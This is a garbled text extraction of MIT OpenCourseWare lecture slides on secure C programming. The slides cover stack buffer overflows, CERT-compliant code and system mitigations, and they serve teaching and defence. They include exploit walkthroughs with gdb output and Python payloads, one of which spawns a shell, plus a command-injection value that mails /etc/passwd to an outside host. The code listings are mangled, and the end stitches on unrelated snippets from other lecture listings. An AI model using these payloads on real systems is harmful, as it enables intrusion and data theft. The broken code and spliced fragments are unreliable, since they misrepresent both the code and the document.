Lecture 3: Secure Programming In C - MIT OpenCourseWare
Secure Programming in CLef IoannidisMIT EECSLef IoannidisHow to secure your stack for fun and profitMIT EECS1
IntroductionsMeJunior at MIT, course 6.2. Interested in Computer Security,Operating Systems, Distributed Computing and SystemAdministration.YouComputer programmers with knowledge in C and Systems,can read assembly, interested in writing secure code.Lef IoannidisHow to secure your stack for fun and profitMIT EECS2
Vulnerability statistics over the years (NIST)Image is in the public domain. Courtesy of National Institute of Standards and Technology (NIST).Lef IoannidisHow to secure your stack for fun and profitMIT EECS3
Lecture RoadmapWhat we will cover:Example attacks and exploits.C-specific prevention & mitigation.System-wide prevention & mitigation.Target: GNU/Linux systems.CC: GCC 4.4.Lef IoannidisHow to secure your stack for fun and profitMIT EECS4
Case study: the notorious buffer overflowA buffer overflow example.AB0 0 0 0 0 0 0 0 0 3“excessive”AA‘e’ ‘x’ ‘c’ ‘e’ ‘s’ ‘s’B‘i’ ‘v’ ‘e’0Image by MIT OpenCourseWare.Lef IoannidisHow to secure your stack for fun and profitMIT EECS5
Memory Management: LinuxCourtesy of Gustavo Duarte. Used with permission.http://duartes.org/gustavo/blog/Lef IoannidisHow to secure your stack for fun and profitMIT EECS6
Vulnerable code1#i n c l u d e s t r i n g . h 23#d e f i n e g o o d P a s s ”GOODPASS”4567i n t main ( ) {c h a r p a s s I s G o o d 0 ;char buf [ 8 0 ] ;8p r i n t f ( ” E n t e r p a s s w o r d : \ n” ) ;gets ( buf ) ;91011i f ( s t r c m p ( buf , g o o d P a s s ) 0)p a s s I s G o o d 1 ;i f ( p a s s I s G o o d 1 )p r i n t f ( ”You win ! \ n” ) ;1213141516}Lef IoannidisHow to secure your stack for fun and profitMIT EECS7
Our first exploit/bin/bash python -c " print ’x’*80 ’\x01’ " ./test1Enter password:You win! courierLef IoannidisHow to secure your stack for fun and profitMIT EECS8
Our first exploit/bin/bash python -c " print ’x’*80 ’\x01’ " ./test1Enter password:You win! courierLine 10: gets(buf);“Never use gets().” - GNU Man pages(3), gets()Lef IoannidisHow to secure your stack for fun and profitMIT EECS9
Secure version of previous code12#i n c l u d e s t r i n g . h #i n c l u d e s t d i o . h 345#d e f i n e g o o d P a s s ”GOODPASS”#d e f i n e STRSIZE 806789i n t main ( ) {c h a r p a s s I s G o o d 0 ;c h a r b u f [ STRSIZE 1] ;10p r i n t f ( ” E n t e r p a s s w o r d : \ n” ) ;f g e t s ( buf , STRSIZE , s t d i n ) ;111213i f ( s t r n c m p ( buf , goodPass , STRSIZE) 0)p a s s I s G o o d 1 ;i f ( p a s s I s G o o d 1 )p r i n t f ( ”You win ! \ n” ) ;1415161718}Lef IoannidisHow to secure your stack for fun and profitMIT EECS10
The stack: Linux0xBFFFFDBCint yFunction B’s stack frameint xSaved EBPSaved EIP (points to a location in function A)function B argument 1 (int a)function B argument 2 (int b)Function A’s stack frameint cSaved EBPSaved EIP (points to a location in main)function A argument 1 (int p)Main’s stack framefunction A argument 2 (int q)int retSaved EBPSaved EIP (points to a location in libc start main)int argcchar**argv0xBFFFFE00char**envplibc start main() stuff.Stack baseImage by MIT OpenCourseWare.Dowd, McDonald, Schuh-The art of software security assesment,fig: 5.3Lef IoannidisHow to secure your stack for fun and profitMIT EECS11
Stack frames: CHow functions are pushed in the stack:1234void function ( int a , int b , int c ) {char buffer1 [ 5 ] ;char buffer2 [ 1 0 ] ;}5678v o i d main ( ) {function (1 ,2 ,3) ;} Gordon Lyon. All rights reserved. This content is excluded from our Creative Commonslicense. For more information, see http://ocw.mit.edu/help/faq-fair-use/.Aleph One - Smashing the stack for fun and profitLef IoannidisHow to secure your stack for fun and profitMIT EECS12
Stack frames: x86 assembly12345678910111213141516171819function :pushlmovlsublleaveret.size. g l o b l main.typemain :pushlmovlsublmovlmovlmovlcallleaveret%ebp%esp , %ebp 16 , %e s pf u n c t i o n , . f u n c t i o nmain , @ f u n c t i o n%ebp%esp , %ebp 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )functionLef IoannidisHow to secure your stack for fun and profitMIT EECS13
Stack operations to call function12345sublmovlmovlmovlcall 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )function3 sizeof(int) 12 bytes.Note: The arguments are in reverse order because the Linuxstack grows down.Call will push the IP in the stack.Lef IoannidisHow to secure your stack for fun and profitMIT EECS14
Stack operations to call function12345sublmovlmovlmovlcall 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )function1234function :p u s h l %ebpmovl %esp , %ebps u b l 16 , %e s pPushes the base pointer (EBP) in the stack, now it’s a savedframe pointer (SFP).Moves the stack pointer (ESP) in EBP, substituting theprevious address.Subtracts space for the local variables from ESP.Lef IoannidisHow to secure your stack for fun and profitMIT EECS15
Smashing the stackUsing buffer overflow to overwrite a return address.Stack framepointerPass bigbufferHand-craftedcodePointerto startof bufferbuffSFPParameterstrRetstrStack afterattackLocal variable buffExecute from here on function return!Function’s returnaddressImages by MIT OpenCourseWare.Lef IoannidisHow to secure your stack for fun and profitMIT EECS16
Cool exercise: stack4.c123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 000a0d00 )p r i n t f ( ” you win ! \ n” ) ;8910} Gera at Core SECURITY TECHNOLOGIES Community. All rights reserved. This content is excluded from our CreativeCommons license. For more information, see unity.corest.com/ gera/InsecureProgramming/"Lef IoannidisHow to secure your stack for fun and profitMIT EECS17
Cool exercise: stack4.c123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 000a0d00 )p r i n t f ( ” you win ! \ n” ) ;8910}Still uses gets(), so it is vulnerable to buffer overflow.0x000a0d00 { NULL, new line, carriage return, NULL }Impossible to write 0x000a0d00 to cookie because all thesebytes trigger gets() to stop reading characters.We need to redirect program flow to printf(“You win\n”);Lef IoannidisHow to secure your stack for fun and profitMIT EECS18
Overwriting the EIP123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 000a0d00 )p r i n t f ( ” you win ! \ n” ) ;8910}When a function is called it imediatelly pushes the EIP intothe stack (SFP).After it is complete a ret instruction pops the stack andmoves SFP back to EIP.Trick: Overwrite the SFP, while it’s in the stack.Lef IoannidisHow to secure your stack for fun and profitMIT EECS19
Exploiting stack#4.c/bin/bash gdb stack4(gdb) rStarting program: stack4buf: bffff58c cookie: aaaaaaaaaa.Program received signal SIGSEGV, Segmentation fault.0x61616161 in ? () courierEIP is overwritten! 0x61616161 “aaaa”Lef IoannidisHow to secure your stack for fun and profitMIT EECS20
Now let’s disassemble main()12345678910111213141516171819200 x080484240 x080484250 x080484270 x0804842a0 x0804842d0 x080484310 x080484350 x080484390 x0804843d0 x080484440 x080484490 x0804844d0 x080484500 x080484550 x080484590 x0804845e0 x080484600 x080484670 x0804846c0 x0804846d main 0 : push main 1 : mov main 3 : and main 6 : s u b main 9 : l e a main 13 : mov main 17 : l e a main 21 : mov main 25 : movl main 32 : c a l l main 37 : l e a main 41 : mov main 44 : c a l l main 49 : mov main 53 : cmp main 58 : j n e main 60 : movl main 67 : c a l l main 72 : l e a v e main 73 : r e tLef IoannidisHow to secure your stack for fun and profit%ebp%esp ,% ebp 0 x f f f f f f f 0 ,% e s p 0x70 ,% e s p0 x 6 c(% e s p ) ,% e a x%eax , 0 x8(% e s p )0 x 1 c(% e s p ) ,% e a x%eax , 0 x4(% e s p ) 0x8048530 ,(% e s p )0 x8048350 p r i n t f @ p l t 0 x 1 c(% e s p ) ,% e a x%eax ,(% e s p )0 x8048330 g e t s @ p l t 0 x 6 c(% e s p ) ,% e a x 0xa0d00 ,% e a x0 x 8 0 4 8 4 6 c main 72 0x8048548 ,(% e s p )0 x8048360 p u t s @ p l t MIT EECS21
Registers/bin/gdb stack4(gdb) b *0x0804846d(gdb) rStarting program: stack4buf: bffff58c cookie: bffff5dcaaaaaaaaaaaaaaaaBreakpoint 1, 0x0804846d in main () at stack4.c:13(gdb) info registerseax0xb7fc8ff4 -1208184844ecx0xbffff58c -1073744500edx0xb7fca334 -1208179916ebx0xb7fc8ff4 -1208184844esp0xbffff5ec 0xbffff5ecebp0xbffff668 0xbffff668esi0x0 0edi0x0 0eip0x804846d 0x804846d main 73 courierLef IoannidisHow to secure your stack for fun and profitMIT EECS22
We have everything we needbuf: bffff58cesp: 0xbffff5ec 0xbffff5ec12340 x080484590 x0804845e0 x080484600 x08048467 main 53 : main 58 : main 60 : main 67 :cmpjnemovlcall 0xa0d00 ,% e a x0 x 8 0 4 8 4 6 c main 72 0x8048548 ,(% e s p )0 x8048360 p u t s @ p l t 0xbffff5ec 0xbffff58c 0x00000060 96 bytes we need to overflow.Jump to: 0x08048460Linux Reverse stack \x60\x84\x04\x08Lef IoannidisHow to secure your stack for fun and profitMIT EECS23
Payload: Control Flow Redirection/bin/bash python -c ’’print ’a’ * 96 ’\x60\x84\x04\x08’ ’’ ./test1buf: bffff58c cookie: bffff5dcyou win!Segmentation fault courierLef IoannidisHow to secure your stack for fun and profitMIT EECS24
Payload: Getting shellexploit.py#!/usr/bin/env pythonshellcode f\xff/bin/sh’courierprint shellcode ’\x90’ * 51 ’\x5c\xb3\x04\x08’/bin/bash - Got shell! python exploit.py ./stack4buf: bffff58c cookie: bffff5dc courierLef IoannidisHow to secure your stack for fun and profitMIT EECS25
Other Attacks- Off-by-one exploitsCommon programming mistake when computing array boundaries.In little endian architectures this can result in overwriting the leastsignificant byte.Apache off-by-one bug 2007, sudo off-by-one bug 2008 etc.Lef IoannidisHow to secure your stack for fun and profitMIT EECS26
Other Attacks- Return-to-libcSimilar in principal to a buffer overflow but instead of executingarbitrary shellcode you call functions from libc.so.Works when a noexec stack is enforced.Lef IoannidisHow to secure your stack for fun and profitMIT EECS27
Other Attacks- Heap OverflowTaking advantage of libc bugs to take over dynamicaly allocatedmemory, or even the memory allocator itself. Many 0-day exploitsnowdays are heap overflows.He who controls the allocator, controls the system! - AnonymousLef IoannidisHow to secure your stack for fun and profitMIT EECS28
More informationThe Phrack magazine. (http://www.phrack.org)The Defcon Conference. (http://www.defcon.org)LL CTF, MIT SEC seminars.Next: C-specific prevention & mitigationLef IoannidisHow to secure your stack for fun and profitMIT EECS29
Secure your code: CERT secure coding standardsLogo for CERT Software Engineering Institute, Carnegie Mellon removed due to copyright restrictions.Standards for C, C and Java (some still underdevelopment).Managed string library.Real world examples of insecure code.Lef IoannidisHow to secure your stack for fun and profitMIT EECS30
Learning by the coutner-example of othersBad code examples will help you learn how to write secure codeand prevent:Security HolesUndefined beheaviourObscurityErrorsLef IoannidisHow to secure your stack for fun and profitMIT EECS31
String null termination errors#1123i n t main ( i n t a r g c , c h a r a r g v [ ] ) {char cmdline [4096] ;c m d l i n e [ 0 ] ’ \0 ’ ;4f o r ( i n t i 1 ; i a r g c ; i ) {s t r c a t ( cmdline , argv [ i ] ) ;s t r c a t ( cmdline , ” ” ) ;}/ . . . /return 0 ;567891011}Lef IoannidisHow to secure your stack for fun and profitMIT EECS32
Compliant code1234567891011121314151617181920i n t main ( i n t a r g c , c h a r a r g v [ ] ) {size t bufsize 0;size t buflen 0 ;c h a r c m d l i n e NULL ;f o r ( i n t i 1 ; i a r g c ; i ) {const s i z e t len s t r l e n ( argv [ i ] ) ;i f ( b u f s i z e b u f l e n l e n ) {bufsize ( bufsize len ) 2 ;cmdline r e a l l o c ( cmdline , b u f s i z e ) ;i f (NULL c m d l i n e )return 1 ;/ r e a l l o c f a i l u r e /}memcpy ( c m d l i n e b u f l e n , a r g v [ i ] , l e n ) ;b u f l e n l e n ;c m d l i n e [ b u f l e n ] ’ ’ ;}c m d l i n e [ b u f l e n ] ’ \0 ’ ;/ . . . /f r e e ( cmdline ) ;return 0 ;}21Lef IoannidisHow to secure your stack for fun and profitMIT EECS33
String null termination errors#21c h a r b u f [ BUFSIZ ] ;2345i f ( g e t s ( b u f ) NULL) {/ H a n d l e E r r o r /}Lef IoannidisHow to secure your stack for fun and profitMIT EECS34
Compliant code123c h a r b u f [ BUFFERSIZE ] ;i n t ch ;c h a r p ;4567891011121314151617181920i f ( f g e t s ( buf , s i z e o f ( b u f ) , s t d i n ) ) {/ f g e t s s u c c e e d s , s c a n f o r n e w l i n e c h a r a c t e r /p s t r c h r ( buf , ’ \n ’ ) ;i f (p) p ’ \0 ’ ;else {/ n e w l i n e n o t found , f l u s h s t d i n t o end o f l i n e /w h i l e ( ( ( ch g e t c h a r ( ) ) ! ’ \n ’ )&& ! f e o f ( s t d i n )&& ! f e r r o r ( s t d i n ));}}else {/ f g e t s f a i l e d , h a n d l e e r r o r /}Lef IoannidisHow to secure your stack for fun and profitMIT EECS35
String null termination errors#31234char s t r i n g d a t a ;char a [ 1 6 ] ;/ . . . /strncpy (a , string data ,Lef IoannidisHow to secure your stack for fun and profits i z e o f (a )) ;MIT EECS36
Compliant solution:12c h a r s t r i n g d a t a NULL ;char a [ 1 6 ] ;34/ . . . /567891011121314i f ( s t r i n g d a t a NULL) {/ H a n d l e n u l l p o i n t e r e r r o r /}e l s e i f ( s t r l e n ( s t r i n g d a t a ) s i z e o f ( a ) ) {/ H a n d l e o v e r l o n g s t r i n g e r r o r /}else {strcpy (a , string data ) ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS37
Passing strings to complex subsystems12s p r i n t f ( b u f f e r , ” / b i n / m a i l %s /tmp/ e m a i l ” , a d d r ) ;system ( b u f f e r ) ; O'Reilly Media. All rights reserved. This content is excluded from our Creative Commonslicense. For more information, see http://ocw.mit.edu/help/faq-fair-use/.Viega, John, & Messier, Matt. Secure Programming Cookbook for C and C : Recipes for Cryptography,Authentication, Networking, Input Validation & More.Lef IoannidisHow to secure your stack for fun and profitMIT EECS38
Passing strings to complex subsystems12s p r i n t f ( b u f f e r , ” / b i n / m a i l %s /tmp/ e m a i l ” , a d d r ) ;system ( b u f f e r ) ;What if:bogus@addr.com; cat /etc/passwd mail somebadguy.net O'Reilly Media. All rights reserved. This content is excluded from our Creative Commonslicense. For more information, see http://ocw.mit.edu/help/faq-fair-use/.Viega, John, & Messier, Matt. Secure Programming Cookbook for C and C : Recipes for Cryptography,Authentication, Networking, Input Validation & More.Lef IoannidisHow to secure your stack for fun and profitMIT EECS39
Compliant solution: Whitelisting1234567891011s t a t i c char ok chars [ ] ” abcdefghijklmnopqrstuvwxyz ””ABCDEFGHIJKLMNOPQRSTUVWXYZ”” 1234567890 .@ ” ;c h a r u s e r d a t a [ ] ”Bad c h a r 1 : } Bad c h a r 2 : { ” ;c h a r cp u s e r d a t a ; / c u r s o r i n t o s t r i n g /c o n s t c h a r end u s e r d a t a s t r l e n ( u s e r d a t a ) ;f o r ( cp s t r s p n ( cp , o k c h a r s ) ;cp ! end ;cp s t r s p n ( cp , o k c h a r s ) ) { cp ’ ’ ;}Based on the tcp wrappers package written by Wietse VenemaLef IoannidisHow to secure your stack for fun and profitMIT EECS40
Off-by-one errorsCan you find all the off-by-one errors?12345678910i n t main ( i n t a r g c , c h a r a r g v [ ] ) {char source [ 1 0 ] ;s t r c p y ( s o u r c e , ” 0123456789 ” ) ;char d e s t ( char ) malloc ( s t r l e n ( s o u r c e ) ) ;f o r ( i n t i 1 ; i 1 1 ; i ) {dest [ i ] source [ i ] ;}d e s t [ i ] ’ \0 ’ ;p r i n t f ( ” d e s t %s ” , d e s t ) ;} Carnegie Mellon University. All rights reserved. This content is excluded from our CreativeCommons license. For more information, see http://ocw.mit.edu/help/faq-fair-use/.Robert Seacord, CERT: Safer strings in CLef IoannidisHow to secure your stack for fun and profitMIT EECS41
Integer overflow errors#1: Addition1u n s i g n e d i n t u i 1 , u i 2 , usum ;23/ I n i t i a l i z eu i 1 and u i 2 /45usum u i 1 u i 2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS42
Compliant code1u n s i g n e d i n t u i 1 , u i 2 , usum ;23/ I n i t i a l i z eu i 1 and u i 2 /45678910i f (UINT MAX u i 1 u i 2 ) {/ h a n d l e e r r o r c o n d i t i o n /}else {usum u i 1 u i 2 ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS43
Integer overfloat errors#2: Subtraction1signed int si1 , si2 ,result ;23/ I n i t i a l i z es i 1 and s i 2 /45result si1 si2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS44
Compliant code1signed int si1 , si2 ,result ;23/ I n i t i a l i z es i 1 and s i 2 /4567891011if( ( s i 2 0 && s i 1 INT MIN s i 2 ) ( s i 2 0 && s i 1 INT MAX s i 2 ) ) {/ h a n d l e e r r o r c o n d i t i o n /}else {result si1 si2 ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS45
Integer overfloat errors#3: Multiplication12signed int si1 , si2 ,result ;34/ . . . /56result si1 si2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS46
Compliant code1signed int si1 , si2 ,result ;2345678910111213141516171819/ I n i t i a l i z e s i 1 and s i 2 /static assert (s i z e o f ( l o n g l o n g ) 2 s i z e o f ( i n t ) ,” Unable to d e t e c t o v e r f l o w a f t e r m u l t i p l i c a t i o n ”);s i g n e d l o n g l o n g tmp ( s i g n e d l o n g l o n g ) s i 1 ( signed long long ) s i 2 ;/ I f t h e p r o d u c t c a n n o t be r e p r e s e n t e d a s a 32 b i t i n t e g e r , h a n d l e a s an e r r o r c o n d i t i o n . /i f ( ( tmp INT MAX ) ( tmp INT MIN ) ) {/ h a n d l e e r r o r c o n d i t i o n /}else {r e s u l t ( i n t ) tmp ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS47
GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS48
GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Expands to:1i n t a 81 / (( i ) ( i ) ( i ) ) ; // U n d e f i n e d !Lef IoannidisHow to secure your stack for fun and profitMIT EECS49
GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Expands to:1i n t a 81 / (( i ) ( i ) ( i ) ) ; // U n d e f i n e d !Compliant code12345i n l i n e i n t cube ( i n t i ) {return i i i ;}int i 2;i n t a 81 / c u b e( i ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS50
Pointer arithmetic: Never for different arrays1234i n t nums [ SIZE ] ;c h a r s t r i n g s [ SIZE ] ;i n t n e x t n u m p t r nums ;int free bytes ;56/ i n c r e m e n t n e x t n u m p t r a s a r r a yf i l l s /78f r e e b y t e s s t r i n g s ( char ) next num ptr ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS51
Compliant solution1234i n t nums [ SIZE ] ;c h a r s t r i n g s [ SIZE ] ;i n t n e x t n u m p t r nums ;int free bytes ;56/ i n c r e m e n t n e x t n u m p t r a s a r r a yf i l l s /78f r e e b y t e s (&( nums [ SIZE ] ) n e x t n u m p t r ) s i z e o f ( i n t ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS52
GCC Preprocessor: inlines VS macrosNon-compliant code12#d e f i n e F ( x ) ( o p e r a t i o n s , c a l l s t o F , 2 x )#d e f i n e G( x ) ( o p e r a t i o n s , c a l l s t o G , x 1 )34y F ( x ) G( x ) ;The variable operations is both read and modified twice in thesame expression, so it can receive the wrong value.Lef IoannidisHow to secure your stack for fun and profitMIT EECS53
Compliant code12345678910inline int f ( int x) { o p e r a t i o n s ; c a l l s t o f ;r e t u r n 2 x ;}inline int g( int x) { o p e r a t i o n s ; c a l l s t o g ;return x 1 ;}1112y f (x) g(x) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS54
Advanced techniques for securing your codeUsing secure libraries: Managed string library, Microsoftsecure string library, safeStr.They provide alternatives to insecure standard C functions.(ie: safestrsafestrLef IoannidisHow to secure your stack for fun and cpy()strcmp()strlen()sprintf()vsprintf()MIT EECS55
Advanced techniques for securing your codeCanariesTerminator: NULL, CR, LF, -1. Weak because the canary isknown.Random: Generating random bytes in the end of buffer duringruntime.Random XOR: Random canaries XOR scrambled with all orparts of the control data.Lef IoannidisHow to secure your stack for fun and profitMIT EECS56
Protecting your SystemWˆX protection, the data section on the stack is flagged asnot executable and the program memory as not writable.ASLR: Address space layout randomization. Randomlyallocate shared libraries, stack and heap.Setting the NX bit: CPU support for flagging executable andnon-executable data. Reduces overhead for WˆX.iOS5: CSE: Code Signing Enforcement. Signing eachexecutable memory page and checking the CS VALID flag.Prevents changes in executable code during runtime.Lef IoannidisHow to secure your stack for fun and profitMIT EECS57
ExamplesPaX on LinuxOpenBSD kernelHardened GentoogrsecurityMicrosoft Windows Server 2008 R2Lef IoannidisHow to secure your stack for fun and profitMIT EECS58
That’s all!Thank you. Questions?Lef IoannidisHow to secure your stack for fun and profitMIT EECS59
MIT OpenCourseWarehttp://ocw.mit.edu6.S096 Effective Programming in C and C IAP 2014For information about citing these materials or our Terms of Use, visit: http://ocw.mit.edu/terms.
1 subl 12 , %esp 1 function : 2 movl 3 , 8(%esp ) 2 pushl %ebp 3 movl 2 , 4(%esp ) 3 movl %esp , %ebp 4 movl 1 , (%esp ) 4 subl 16 , %esp 5 c a l l function. Pushes the base pointer (EBP) in the stack, now it’s a saved frame pointer (SFP). Moves the stack pointer (ESP) in EBP, subst
Introduction of Chemical Reaction Engineering Introduction about Chemical Engineering 0:31:15 0:31:09. Lecture 14 Lecture 15 Lecture 16 Lecture 17 Lecture 18 Lecture 19 Lecture 20 Lecture 21 Lecture 22 Lecture 23 Lecture 24 Lecture 25 Lecture 26 Lecture 27 Lecture 28 Lecture
Lecture 1: A Beginner's Guide Lecture 2: Introduction to Programming Lecture 3: Introduction to C, structure of C programming Lecture 4: Elements of C Lecture 5: Variables, Statements, Expressions Lecture 6: Input-Output in C Lecture 7: Formatted Input-Output Lecture 8: Operators Lecture 9: Operators continued
Lecture 1: Introduction and Orientation. Lecture 2: Overview of Electronic Materials . Lecture 3: Free electron Fermi gas . Lecture 4: Energy bands . Lecture 5: Carrier Concentration in Semiconductors . Lecture 6: Shallow dopants and Deep -level traps . Lecture 7: Silicon Materials . Lecture 8: Oxidation. Lecture
TOEFL Listening Lecture 35 184 TOEFL Listening Lecture 36 189 TOEFL Listening Lecture 37 194 TOEFL Listening Lecture 38 199 TOEFL Listening Lecture 39 204 TOEFL Listening Lecture 40 209 TOEFL Listening Lecture 41 214 TOEFL Listening Lecture 42 219 TOEFL Listening Lecture 43 225 COPYRIGHT 2016
Partial Di erential Equations MSO-203-B T. Muthukumar tmk@iitk.ac.in November 14, 2019 T. Muthukumar tmk@iitk.ac.in Partial Di erential EquationsMSO-203-B November 14, 2019 1/193 1 First Week Lecture One Lecture Two Lecture Three Lecture Four 2 Second Week Lecture Five Lecture Six 3 Third Week Lecture Seven Lecture Eight 4 Fourth Week Lecture .
a speci c, commonly used, case of secure computation. To implement secure computation and secure key storage on mobile platforms hardware solutions were invented. One commonly used solution for secure computation and secure key storage is the Secure Element [28]. This is a smart card like tamper resistant
Secure Production Programming Solution using HSM TU0823 Tutorial Revision 1.0 7 2 Secure Production Programming Solution using HSM 2.1 Overview Microsemi offers Secure Production Programming Solution (SPPS) to prevent overbuilding and cloning of the user designs. For implementing the SPPS, two Hardware Security Modules (HSM) are required.
Secure Shell is a protocol that provides authentication, encryption and data integrity to secure network communications. Implementations of Secure Shell offer the following capabilities: a secure command-shell, secure file transfer, and remote access to a variety of TCP/IP applications via a secure tunnel.
